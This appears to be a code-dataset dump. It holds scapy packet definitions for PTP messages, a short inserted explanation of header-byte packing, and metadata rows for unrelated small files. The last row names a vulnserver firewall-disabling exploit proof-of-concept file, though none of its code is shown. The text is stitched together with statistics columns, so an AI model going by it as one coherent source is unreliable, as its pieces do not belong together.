0x2: "PdelayReq",
0x3: "PdelayResp",
0x8: "FollowUp",
0x9: "DelayResp",
0xA: "PdelayRespFollowUp"
}
FLAGS = [
"SECURITY", "profileSpecific2", "profileSpecific1", "?",
"?", "UNICAST", "TWO_STEP", "ALTERNATE_MASTER",
"?", "?","FREQUENCY_TRACEABLE","TIME_TRACEABLE",
"TIMESCALE", "UTC_REASONABLE", "LI59", "LI61"
]
fields_desc = [
BitField("transportSpecific", 1, 4),
BitEnumField("messageType", 0x1, 4, MSG_TYPES),
XBitField("reserved0", 0, 4),
BitField("versionPTP", 0x2, 4),
ShortField("messageLength", 44),
ByteField("domainNumber", 0),
XByteField("reserved1", 0),
FlagsField("flags", 0x0200, 16, FLAGS),
LongField("correctionField", 0),
XIntField("reserved2", 0),
XBitField('sourcePortIdentity', 0x008063FFFF0009BA, 80),
#BitField('clockIdentity', 0x888, 64),
#BitField('sourcePortIdentity', 10000, 16),
ShortField("sequenceId", 0),
XByteField("control", 0),
SignedByteField("logMessageInterval", 0),
# DelayReq
BitField("originTimestamp", 100, 80)
]
class PdelayReq(Packet):
"""Precision Time Protocol"""
name = "PTP protocol PdelayReq"
MSG_TYPES = {
0x0: "Sync",
0x1: "DelayReq",
0x2: "PdelayReq",
0x3: "PdelayResp",
0x8: "FollowUp",
0x9: "DelayResp",
0xA: "PdelayRespFollowUp"
}
FLAGS = [
"SECURITY", "profileSpecific2", "profileSpecific1", "?",
"?", "UNICAST", "TWO_STEP", "ALTERNATE_MASTER",
"?", "?","FREQUENCY_TRACEABLE","TIME_TRACEABLE",
"TIMESCALE", "UTC_REASONABLE", "LI59", "LI61"
]
fields_desc = [
BitField("transportSpecific", 1, 4),
BitEnumField("messageType", 0x2, 4, MSG_TYPES),
XBitField("reserved0", 0, 4),
BitField("versionPTP", 0x2, 4),
ShortField("messageLength", 54),
ByteField("domainNumber", 0),
XByteField("reserved1", 0),
FlagsField("flags", 0x0200, 16, FLAGS),
LongField("correctionField", 0),
XIntField("reserved2", 0),
XBitField('sourcePortIdentity', 0x008063FFFF0009BA, 80),
#BitField('clockIdentity', 0x888, 64),
#BitField('sourcePortIdentity', 10000, 16),
ShortField("sequenceId", 0),
XByteField("control", 0),
SignedByteField("logMessageInterval", 0),
# PdelayReq
BitField("originTimestamp", 0, 80),
BitField("reserved3", 10000, 80)
]
class PdelayResp(Packet):
"""Precision Time Protocol"""
name = "PTP protocol PdelayResp"
MSG_TYPES = {
0x0: "Sync",
0x1: "DelayReq",
0x2: "PdelayReq",
0x3: "PdelayResp",
0x8: "FollowUp",
0x9: "DelayResp",
0xA: "PdelayRespFollowUp"
}
FLAGS = [
"SECURITY", "profileSpecific2", "profileSpecific1", "?",
"?", "UNICAST", "TWO_STEP", "ALTERNATE_MASTER",
"?", "?","FREQUENCY_TRACEABLE","TIME_TRACEABLE",
"TIMESCALE", "UTC_REASONABLE", "LI59", "LI61"
]
fields_desc = [
BitField("transportSpecific", 1, 4),
BitEnumField("messageType", 0x3, 4, MSG_TYPES),
XBitField("reserved0", 0, 4),
BitField("versionPTP", 0x2, 4),
ShortField("messageLength", 54),
ByteField("domainNumber", 0),
XByteField("reserved1", 0),
FlagsField("flags", 0x0200, 16, FLAGS),
LongField("correctionField", 0),
XIntField("reserved2", 0),
XBitField('sourcePortIdentity', 0x008063FFFF0009BA, 80),
#BitField('clockIdentity', 0x888, 64),
#BitField('sourcePortIdentity', 10000, 16),
ShortField("sequenceId", 0),
XByteField("control", 0),
SignedByteField("logMessageInterval", 0),
# PdelayResp
BitField("requestReceiptTimestamp", 10000000, 80),
BitField("requestingPortIdentity", 10000000, 80),
]
class FollowUp(Packet):
"""Precision Time Protocol"""
name = "PTP protocol FollowUp"
MSG_TYPES = {
0x0: "Sync",
0x1: "DelayReq",
0x2: "PdelayReq",
0x3: "PdelayResp",
0x8: "FollowUp",
0x9: "DelayResp",
0xA: "PdelayRespFollowUp"
}
FLAGS = [
"SECURITY", "profileSpecific2", "profileSpecific1", "?",
"?", "UNICAST", "TWO_STEP", "ALTERNATE_MASTER",
"?", "?","FREQUENCY_TRACEABLE","TIME_TRACEABLE",
"TIMESCALE", "UTC_REASONABLE", "LI59", "LI61"
]
fields_desc = [
BitField("transportSpecific", 1, 4),
BitEnumField("messageType", 0x8, 4, MSG_TYPES),
XBitField("reserved0", 0, 4),
BitField("versionPTP", 0x2, 4),
ShortField("messageLength", 44),
ByteField("domainNumber", 0),
XByteField("reserved1", 0),
FlagsField("flags", 0x0200, 16, FLAGS),
LongField("correctionField", 0),
XIntField("reserved2", 0),
XBitField('sourcePortIdentity', 0x008063FFFF0009BA, 80),
#BitField('clockIdentity', 0x888, 64),
#BitField('sourcePortIdentity', 10000, 16),
ShortField("sequenceId", 0),
XByteField("control", 0),
SignedByteField("logMessageInterval", 0),
# FollowUp
BitField('preciseOriginTimestamp', 0x888, 80),
]
class DelayResp(Packet):
"""Precision Time Protocol"""
name = "PTP protocol DelayResp"
MSG_TYPES = {
0x0: "Sync",
0x1: "DelayReq",
0x2: "PdelayReq",
0x3: "PdelayResp",
0x8: "FollowUp",
0x9: "DelayResp",
0xA: "PdelayRespFollowUp"
}
FLAGS = [
"SECURITY", "profileSpecific2", "profileSpecific1", "?",
"?", "UNICAST", "TWO_STEP", "ALTERNATE_MASTER",
"?", "?","FREQUENCY_TRACEABLE","TIME_TRACEABLE",
"TIMESCALE", "UTC_REASONABLE", "LI59", "LI61"
]
fields_desc = [
BitField("transportSpecific", 1, 4),
BitEnumField("messageType", 0x9, 4, MSG_TYPES),
XBitField("reserved0", 0, 4),
BitField("versionPTP", 0x2, 4),
ShortField("messageLength", 54),
ByteField("domainNumber", 0),
XByteField("reserved1", 0),
FlagsField("flags", 0x0200, 16, FLAGS),
LongField("correctionField", 0),
XIntField("reserved2", 0),
XBitField('sourcePortIdentity', 0x008063FFFF0009BA, 80),
#BitField('clockIdentity', 0x888, 64),
#BitField('sourcePortIdentity', 10000, 16),
ShortField("sequenceId", 0),
XByteField("control", 0),
SignedByteField("logMessageInterval", 0),
# DelayResp
BitField("receiveTimestamp", 10000000, 80),
BitField("requestingPortIdentity", 100, 80)
]
class PdelayRespFollowUp(Packet):
"""Precision Time Protocol"""
name = "PTP protocol PdelayRespFollowUp"
MSG_TYPES = {
0x0: "Sync",
0x1: "DelayReq",
0x2: "PdelayReq",
0x3: "PdelayResp",
0x8: "FollowUp",
0x9: "DelayResp",
0xA: "PdelayRespFollowUp"
}
FLAGS = [
"SECURITY", "profileSpecific2", "profileSpecific1", "?",
"?", "UNICAST", "TWO_STEP", "ALTERNATE_MASTER",
"?", "?","FREQUENCY_TRACEABLE","TIME_TRACEABLE",
"TIMESCALE", "UTC_REASONABLE", "LI59", "LI61"
]
fields_desc = [
BitField("transportSpecific", 1, 4),
BitEnumField("messageType", 0xA, 4, MSG_TYPES),
XBitField("reserved0", 0, 4),
BitField("versionPTP", 0x2, 4),
ShortField("messageLength", 54),
ByteField("domainNumber", 0),
XByteField("reserved1", 0),
FlagsField("flags", 0x0200, 16, FLAGS),
LongField("correctionField", 0),
XIntField("reserved2", 0),
XBitField('sourcePortIdentity', 0x008063FFFF0009BA, 80),
#BitField('clockIdentity', 0x888, 64),
#BitField('sourcePortIdentity', 10000, 16),
ShortField("sequenceId", 0),
XByteField("control", 0),
SignedByteField("logMessageInterval", 0),
# PdelayRespFollowUp
BitField("responseOriginTimestamp", 10000000, 80),
BitField("requestingPortIdentity", 10000000, 80),
]
class PTP(Packet):
"""Precision Time Protocol"""
name = "PTP protocol"
fields_desc = [
XBitField('transportSpecific', 0x1, 4),
XBitField('messageType', 0x0, 4),
XBitField('reserved0', 0x2, 4),
XBitField('versionPTP', 0x2, 4),
ShortField('messageLength', 0x2C),
XBitField('domainNumber', 0x0, 8),
XBitField('reserved1', 0x1, 8),
ShortField('flags', 0x0),
XBitField('correction', 0x0, 64),
IntField('reserved2', 0x0),
XBitField('sourcePortIdentity', 0x008063FFFF0009BA, 80),
ShortField('sequenceId', 0x9E48),
XBitField('PTPcontrol', 0x05, 8),
XBitField('logMessagePeriod', 0x0F, 8),
XBitField('originTimestamp', 0x000045B111510472F9C1, 80)
]
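The `BitField(..., 4)` declarations above mean the first PTP header octet packs `transportSpecific` in the high nibble and `messageType` in the low nibble. A scapy-free sketch of that packing (function name hypothetical):

```python
# Pack two 4-bit fields into the first PTP header byte, matching the
# order of the BitField declarations in the classes above.
PTP_SYNC, PTP_DELAY_REQ = 0x0, 0x1

def first_ptp_byte(transport_specific, message_type):
    return (transport_specific & 0xF) << 4 | (message_type & 0xF)

print(hex(first_ptp_byte(1, PTP_SYNC)))       # 0x10
print(hex(first_ptp_byte(1, PTP_DELAY_REQ)))  # 0x11
```

This is why each class differs only in the `messageType` default and the trailing message-specific fields; the common header layout is identical across all of them.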
| 31.622535 | 64 | 0.561286 | 875 | 11,226 | 7.136 | 0.118857 | 0.017937 | 0.024343 | 0.034593 | 0.806374 | 0.800448 | 0.800448 | 0.72902 | 0.72902 | 0.72902 | 0 | 0.08742 | 0.289774 | 11,226 | 354 | 65 | 31.711864 | 0.695723 | 0.072867 | 0 | 0.688406 | 0 | 0 | 0.300986 | 0.012952 | 0 | 0 | 0.046685 | 0 | 0 | 1 | 0 | false | 0 | 0.007246 | 0 | 0.144928 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
02de16e29605f5a1daa10d952ea002a4f013143b | 47 | py | Python | __init__.py | GPaolo/SERENE | 83bc38a37ad8f1be9695d2483fd463428d4dae23 | [
"MIT"
] | 3 | 2021-04-19T21:55:00.000Z | 2021-12-20T15:26:12.000Z | __init__.py | GPaolo/SERENE | 83bc38a37ad8f1be9695d2483fd463428d4dae23 | [
"MIT"
] | null | null | null | __init__.py | GPaolo/SERENE | 83bc38a37ad8f1be9695d2483fd463428d4dae23 | [
"MIT"
] | null | null | null | # Created by Giuseppe Paolo
# Date: 27/07/2020 | 23.5 | 28 | 0.723404 | 8 | 47 | 4.25 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.205128 | 0.170213 | 47 | 2 | 29 | 23.5 | 0.666667 | 0.914894 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b8232813dcb83e39ca973743933c60beeb43a867 | 206 | py | Python | codes_/0405_Convert_a_Number_to_Hexadecimal.py | SaitoTsutomu/leetcode | 4656d66ab721a5c7bc59890db9a2331c6823b2bf | [
"MIT"
] | null | null | null | codes_/0405_Convert_a_Number_to_Hexadecimal.py | SaitoTsutomu/leetcode | 4656d66ab721a5c7bc59890db9a2331c6823b2bf | [
"MIT"
] | null | null | null | codes_/0405_Convert_a_Number_to_Hexadecimal.py | SaitoTsutomu/leetcode | 4656d66ab721a5c7bc59890db9a2331c6823b2bf | [
"MIT"
] | null | null | null | # %% [405. Convert a Number to Hexadecimal](https://leetcode.com/problems/convert-a-number-to-hexadecimal/)
class Solution:
def toHex(self, num: int) -> str:
return hex(num & (2 ** 32 - 1))[2:]
| 41.2 | 107 | 0.640777 | 30 | 206 | 4.4 | 0.766667 | 0.121212 | 0.212121 | 0.242424 | 0.409091 | 0 | 0 | 0 | 0 | 0 | 0 | 0.047059 | 0.174757 | 206 | 4 | 108 | 51.5 | 0.729412 | 0.509709 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0.333333 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
b82e3d0ae7d612c7601d575c83a3600914225bdb | 29 | py | Python | gva/data/formats/__init__.py | gva-jjoyce/gva_data | cda990d0abb4b175025aaf16e75192bd9cc213af | [
"Apache-2.0"
] | null | null | null | gva/data/formats/__init__.py | gva-jjoyce/gva_data | cda990d0abb4b175025aaf16e75192bd9cc213af | [
"Apache-2.0"
] | 24 | 2020-12-24T12:21:42.000Z | 2021-01-28T14:22:38.000Z | gva/data/formats/__init__.py | gva-jjoyce/gva_data | cda990d0abb4b175025aaf16e75192bd9cc213af | [
"Apache-2.0"
] | null | null | null | from .group_by import Groups
| 14.5 | 28 | 0.827586 | 5 | 29 | 4.6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.137931 | 29 | 1 | 29 | 29 | 0.92 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
b853f3fb8076032159e18ff8756b360d2904f2ad | 30 | py | Python | act3.py | hummusM/cs3240-labdemo | f96d71caabf44e10321e0831442bc3263bfedbd0 | [
"MIT"
] | null | null | null | act3.py | hummusM/cs3240-labdemo | f96d71caabf44e10321e0831442bc3263bfedbd0 | [
"MIT"
] | null | null | null | act3.py | hummusM/cs3240-labdemo | f96d71caabf44e10321e0831442bc3263bfedbd0 | [
"MIT"
] | null | null | null |
print ("I am trying part 3.") | 15 | 29 | 0.633333 | 6 | 30 | 3.166667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.041667 | 0.2 | 30 | 2 | 29 | 15 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0.633333 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
b87cb3bdaeac134027ad869cc9067e4eb3c2d627 | 20 | py | Python | tests/__init__.py | bitsf/load-m3u8 | f1b9ac875bbd4be625adf9303fe112b2f02af68e | [
"Apache-2.0"
] | null | null | null | tests/__init__.py | bitsf/load-m3u8 | f1b9ac875bbd4be625adf9303fe112b2f02af68e | [
"Apache-2.0"
] | null | null | null | tests/__init__.py | bitsf/load-m3u8 | f1b9ac875bbd4be625adf9303fe112b2f02af68e | [
"Apache-2.0"
] | null | null | null | # _*_coding:utf-8_*_ | 20 | 20 | 0.7 | 3 | 20 | 3.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.052632 | 0.05 | 20 | 1 | 20 | 20 | 0.473684 | 0.9 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b885c3edef9aa23aeaa2cd623011541f4af58c37 | 48 | py | Python | src/aves/models/network/__init__.py | sergioangulo/aves | 43a14ec9c82929136a39590b15fe7f92182aae20 | [
"CC-BY-3.0"
] | 34 | 2020-10-23T08:57:03.000Z | 2022-03-23T17:07:20.000Z | src/aves/models/network/__init__.py | sergioangulo/aves | 43a14ec9c82929136a39590b15fe7f92182aae20 | [
"CC-BY-3.0"
] | 3 | 2021-12-02T22:42:25.000Z | 2021-12-10T02:37:01.000Z | src/aves/models/network/__init__.py | sergioangulo/aves | 43a14ec9c82929136a39590b15fe7f92182aae20 | [
"CC-BY-3.0"
] | 11 | 2021-03-25T02:40:34.000Z | 2022-01-03T22:41:29.000Z | from .base import Network
from .edge import Edge | 24 | 25 | 0.8125 | 8 | 48 | 4.875 | 0.625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.145833 | 48 | 2 | 26 | 24 | 0.95122 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
b895018e5389ab1b02cd0bba6ca315a7ffc7558b | 32 | py | Python | transform/__init__.py | vmproj/conformer-vc | 224d330692cf3245c805bbf78c3e58a7805126d1 | [
"MIT"
] | 1 | 2022-01-24T05:43:13.000Z | 2022-01-24T05:43:13.000Z | transform/__init__.py | vmproj/conformer-vc | 224d330692cf3245c805bbf78c3e58a7805126d1 | [
"MIT"
] | null | null | null | transform/__init__.py | vmproj/conformer-vc | 224d330692cf3245c805bbf78c3e58a7805126d1 | [
"MIT"
] | null | null | null | from .audio import TacotronSTFT
| 16 | 31 | 0.84375 | 4 | 32 | 6.75 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 32 | 1 | 32 | 32 | 0.964286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
b8b5ad4c039cfa4c2f665f679ae234c59cc10487 | 2,061 | py | Python | Laelia/apps/base/migrations/0006_auto_20201001_1731.py | arantesdv/LaeliaAppProject | 93fca5393cb8406694903d9adde02067480c792e | [
"MIT"
] | null | null | null | Laelia/apps/base/migrations/0006_auto_20201001_1731.py | arantesdv/LaeliaAppProject | 93fca5393cb8406694903d9adde02067480c792e | [
"MIT"
] | null | null | null | Laelia/apps/base/migrations/0006_auto_20201001_1731.py | arantesdv/LaeliaAppProject | 93fca5393cb8406694903d9adde02067480c792e | [
"MIT"
] | null | null | null | # Generated by Django 3.0.6 on 2020-10-01 17:31
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('base', '0005_auto_20201001_1634'),
]
operations = [
migrations.AddField(
model_name='patient',
name='address',
field=models.CharField(blank=True, max_length=255, null=True, verbose_name='Address'),
),
migrations.AddField(
model_name='patient',
name='main_phone',
field=models.CharField(blank=True, max_length=20, null=True, verbose_name='Phone (main)'),
),
migrations.AddField(
model_name='patient',
name='neiborhood',
field=models.CharField(blank=True, max_length=100, null=True, verbose_name='Neiborhood'),
),
migrations.AddField(
model_name='patient',
name='notes',
field=models.TextField(blank=True, null=True),
),
migrations.AddField(
model_name='patient',
name='other_phone',
field=models.CharField(blank=True, max_length=20, null=True, verbose_name='Phone (other)'),
),
migrations.AddField(
model_name='professional',
name='address',
field=models.CharField(blank=True, max_length=255, null=True, verbose_name='Address'),
),
migrations.AddField(
model_name='professional',
name='main_phone',
field=models.CharField(blank=True, max_length=20, null=True, verbose_name='Phone (main)'),
),
migrations.AddField(
model_name='professional',
name='neiborhood',
field=models.CharField(blank=True, max_length=100, null=True, verbose_name='Neiborhood'),
),
migrations.AddField(
model_name='professional',
name='other_phone',
field=models.CharField(blank=True, max_length=20, null=True, verbose_name='Phone (other)'),
),
]
| 34.932203 | 103 | 0.583697 | 211 | 2,061 | 5.549763 | 0.232227 | 0.138343 | 0.176772 | 0.207515 | 0.838599 | 0.838599 | 0.695132 | 0.695132 | 0.695132 | 0.695132 | 0 | 0.034812 | 0.28918 | 2,061 | 58 | 104 | 35.534483 | 0.764505 | 0.021834 | 0 | 0.826923 | 1 | 0 | 0.136544 | 0.01142 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.019231 | 0 | 0.076923 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b24a8c999e3a0582f4bd37d888451058ae06ad93 | 187 | py | Python | app/user/resources.py | guidiego/pyground | 962ba01f5a18391b86d091176b056f0ba0431f04 | [
"MIT"
] | 1 | 2016-10-17T15:56:27.000Z | 2016-10-17T15:56:27.000Z | app/user/resources.py | guidiego/pyground | 962ba01f5a18391b86d091176b056f0ba0431f04 | [
"MIT"
] | null | null | null | app/user/resources.py | guidiego/pyground | 962ba01f5a18391b86d091176b056f0ba0431f04 | [
"MIT"
] | null | null | null | from utils.generic_resource import GenericResource
from user.models import User
from utils.generic_resource import router_build
user_routes = router_build(GenericResource(User), "user")
| 31.166667 | 57 | 0.850267 | 25 | 187 | 6.16 | 0.44 | 0.116883 | 0.207792 | 0.311688 | 0.38961 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.090909 | 187 | 5 | 58 | 37.4 | 0.905882 | 0 | 0 | 0 | 0 | 0 | 0.02139 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.75 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
b25711a881b06349619f034bb0b4405f9aaf2eba | 231 | py | Python | paper_forms/conf.py | dldevinc/paper-forms | 6430382a2c369ef346e702d3644f23eba7bd8354 | [
"BSD-3-Clause"
] | 1 | 2021-05-12T06:50:44.000Z | 2021-05-12T06:50:44.000Z | paper_forms/conf.py | dldevinc/paper-forms | 6430382a2c369ef346e702d3644f23eba7bd8354 | [
"BSD-3-Clause"
] | null | null | null | paper_forms/conf.py | dldevinc/paper-forms | 6430382a2c369ef346e702d3644f23eba7bd8354 | [
"BSD-3-Clause"
] | null | null | null | from django.conf import settings
DEFAULT_COMPOSER = getattr(settings, "PAPER_FORMS_DEFAULT_COMPOSER", "paper_forms.composers.base.BaseComposer")
DEFAULT_FORM_RENDERER = getattr(settings, "PAPER_FORMS_DEFAULT_FORM_RENDERER", None)
| 46.2 | 111 | 0.848485 | 29 | 231 | 6.37931 | 0.551724 | 0.162162 | 0.216216 | 0.27027 | 0.345946 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.064935 | 231 | 4 | 112 | 57.75 | 0.856481 | 0 | 0 | 0 | 0 | 0 | 0.4329 | 0.4329 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
b2958878e4ed3b91cf7c14255db618ab28317d50 | 1,570 | bzl | Python | github.com/gogo/protobuf/deps.bzl | mirandacong/rules_proto | b74e93b3a197401da858423d2758aaf4f38be4f9 | [
"Apache-2.0"
] | null | null | null | github.com/gogo/protobuf/deps.bzl | mirandacong/rules_proto | b74e93b3a197401da858423d2758aaf4f38be4f9 | [
"Apache-2.0"
] | null | null | null | github.com/gogo/protobuf/deps.bzl | mirandacong/rules_proto | b74e93b3a197401da858423d2758aaf4f38be4f9 | [
"Apache-2.0"
] | null | null | null | load("//:deps.bzl",
"io_bazel_rules_go",
)
# Same as rules_go as rules_go is already loading gogo protobuf
def gogo_proto_compile(**kwargs):
io_bazel_rules_go(**kwargs)
def gogo_grpc_compile(**kwargs):
gogo_proto_compile(**kwargs)
def gogo_proto_library(**kwargs):
gogo_proto_compile(**kwargs)
def gogo_grpc_library(**kwargs):
gogo_grpc_compile(**kwargs)
gogo_proto_library(**kwargs)
def gogotypes_proto_compile(**kwargs):
gogo_proto_compile(**kwargs)
def gogotypes_grpc_compile(**kwargs):
gogo_grpc_compile(**kwargs)
def gogotypes_proto_library(**kwargs):
gogo_proto_library(**kwargs)
def gogotypes_grpc_library(**kwargs):
gogo_grpc_library(**kwargs)
def gogoslick_proto_compile(**kwargs):
gogo_proto_compile(**kwargs)
def gogoslick_grpc_compile(**kwargs):
gogo_grpc_compile(**kwargs)
def gogoslick_proto_library(**kwargs):
gogo_proto_library(**kwargs)
def gogoslick_grpc_library(**kwargs):
gogo_grpc_library(**kwargs)
def gogofast_proto_compile(**kwargs):
gogo_proto_compile(**kwargs)
def gogofast_grpc_compile(**kwargs):
gogo_grpc_compile(**kwargs)
def gogofast_proto_library(**kwargs):
gogo_proto_library(**kwargs)
def gogofast_grpc_library(**kwargs):
gogo_grpc_library(**kwargs)
def gogofaster_proto_compile(**kwargs):
gogo_proto_compile(**kwargs)
def gogofaster_grpc_compile(**kwargs):
gogo_grpc_compile(**kwargs)
def gogofaster_proto_library(**kwargs):
gogo_proto_library(**kwargs)
def gogofaster_grpc_library(**kwargs):
gogo_grpc_library(**kwargs)
| 22.112676 | 63 | 0.75414 | 204 | 1,570 | 5.372549 | 0.117647 | 0.249088 | 0.180657 | 0.140511 | 0.77281 | 0.74635 | 0.725365 | 0.57573 | 0 | 0 | 0 | 0 | 0.120382 | 1,570 | 70 | 64 | 22.428571 | 0.793628 | 0.038854 | 0 | 0.454545 | 0 | 0 | 0.01858 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.454545 | true | 0 | 0 | 0 | 0.454545 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
a23e117ffaa984577c6715bf73d510266debeb43 | 156 | py | Python | pyjswidgets/pyjamas/ui/FlashPanel.ie6.py | takipsizad/pyjs | 54db0ba6747aca744f9f3c3e985a17e913dfb951 | [
"ECL-2.0",
"Apache-2.0"
] | 739 | 2015-01-01T02:05:11.000Z | 2022-03-30T15:26:16.000Z | pyjswidgets/pyjamas/ui/FlashPanel.ie6.py | takipsizad/pyjs | 54db0ba6747aca744f9f3c3e985a17e913dfb951 | [
"ECL-2.0",
"Apache-2.0"
] | 33 | 2015-03-25T23:17:04.000Z | 2021-08-19T08:25:22.000Z | pyjswidgets/pyjamas/ui/FlashPanel.ie6.py | takipsizad/pyjs | 54db0ba6747aca744f9f3c3e985a17e913dfb951 | [
"ECL-2.0",
"Apache-2.0"
] | 167 | 2015-01-01T22:27:47.000Z | 2022-03-17T13:29:19.000Z | """
@license: Apache License Version 2.0
@copyright: 2009 Tobias Weber
@author: Tobias Weber
@contact: tobi-weber@gmx.de
"""
def browser():
return 'ie' | 17.333333 | 36 | 0.698718 | 22 | 156 | 4.954545 | 0.818182 | 0.201835 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.045455 | 0.153846 | 156 | 9 | 37 | 17.333333 | 0.780303 | 0.74359 | 0 | 0 | 0 | 0 | 0.060606 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0.5 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 6 |
a2597139c66ebffd2c6f35590322a282d4ab7671 | 2,055 | py | Python | winxp_sp3/trun/disable_firewall/registry_openport/trun_openport-registry_poc.py | danf42/vulnserver | 1b01aaa0f0b5706b5bc24c5f64d99dddcdcfe913 | [
"MIT"
] | null | null | null | winxp_sp3/trun/disable_firewall/registry_openport/trun_openport-registry_poc.py | danf42/vulnserver | 1b01aaa0f0b5706b5bc24c5f64d99dddcdcfe913 | [
"MIT"
